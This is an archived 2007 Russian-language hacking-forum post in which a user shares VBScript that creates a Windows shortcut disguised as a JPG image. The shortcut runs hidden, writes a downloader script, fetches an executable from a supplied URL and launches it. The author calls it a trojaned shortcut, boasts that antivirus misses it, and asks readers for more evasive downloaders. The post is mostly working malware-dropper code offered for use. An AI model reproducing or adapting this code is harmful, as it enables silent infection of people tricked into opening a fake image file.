Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   LNK-DownLoadeR (https://forum.antichat.xyz/showthread.php?t=37637)

GROB_T 10.04.2007 23:19

LNK-DownLoadeR
 
Сделал прогу, создающую ярлык, который скачает файл с указанного адреса, причем абсолютно незаметно, а потом запустит его, прога написана на vbs, вот код:

a="http://"'Адрес
Set WshShell=CreateObject("WScript.Shell")
Set WshShortcut=WshShell.CreateShortcut("C:\DownLoader .jpg.lnk")'Путь к ярлыку
WshShortcut.Arguments="/c echo Set o=CreateObject(""MSXML2.XMLHTTP""):o.Open""GET""," ""&a&""",0:o.Send:Set a=CreateObject(""ADODB.Stream""):a.Mode=3:a.Type=1 :a.Open:a.Write o.responseBody:a.SaveToFile""p.exe"",2 >a.vbs&&start /wait a.vbs&&start p.exe"
WshShortcut.Description="DownLoader"'Описан е ярлыка
WshShortcut.IconLocation="shimgvw.dll, 3"'Иконка
WshShortcut.TargetPath="%comspec%"
WshShortcut.WindowStyle=0
WshShortcut.WorkingDirectory="%Temp%"'Рабоча я директория
MsgBox "Протрояненный ярлык был успешно создан в: "&WshShortcut.FullName
WshShortcut.Save

Максимальная длина адреса - 37 символов

Сам ярлык не палится антивирями, но он после запуска создает файл a.vbs, который определяется как downloader, можно конечно попробовать скрыть этот файл от антивирей, но на скрытие уйдет как минимум 25 байт, что уменбшит длинну адреса до 12 символов, что конечно же очень плохо, но я все таки попробую как-то устранить это, если кто-нить знает какой нибудь downloader на vbs, js, то напишите на мыло grob_t@mail.ru или в асю 444452117.


Время: 22:55